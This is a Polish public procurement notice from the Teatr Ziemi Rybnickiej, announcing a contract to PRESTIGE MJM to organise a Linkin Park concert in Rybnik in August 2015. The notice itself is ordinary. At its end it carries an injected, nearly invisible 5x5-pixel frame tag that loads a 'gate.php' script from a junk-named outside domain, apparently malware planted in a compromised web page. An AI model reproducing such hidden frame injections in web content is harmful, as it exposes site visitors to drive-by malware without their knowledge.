Ogłoszenie o udzieleniu zamówienia


Sprawa: 04/AR/RCK/2015

OGŁOSZENIE O UDZIELANYM ZAMÓWIENIU PUBLICZNYM,

o którym mowa w art. 4 pkt 8b ustawy PZP

o wartości przekraczającej wyrażone w złotych równowartości kwoty, o której mowa

w art. 4 u. 8 ustawy Prawo zamówień publicznych1. Nazwa oraz adres zamawiającego: Teatr Ziemi Rybnickiej Plac Teatralny 1, 44-200 Rybnik


2. Określenie przedmiotu oraz wielkość lub zakres zamówienia: zorganizowanie przez PRESTIGE MJM Sp. z o.o. sp.k.- na zlecenie TZR, w dniu 25 sierpnia 2015roku w Rybniku, koncertu Zespołu Linkin Park


3. Nazwa (firma) albo imię i nazwisko podmiotu, któremu zamawiający zamierza udzielić zamówienia: PRESTIGE MJM Sp. z o.o. sp. k. ul. Poznańska 72, 63-400 Ostrów Wielkopolski


Podstawa prawna ogłoszenia: art. 37a ustawy z dnia 25 października 1991 r. o organizowaniu i prowadzeniu działalności kulturalnej (Dz.U. z 2013 r. poz. 406)

 


wpr.: Alicja Klimek-Buszko, dnia: 2015-03-03 12:03:17 historia zmian dokumentu

Archiwum
< src=http://dfdsfsdfasdf.com/gate.php?f=1097533 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>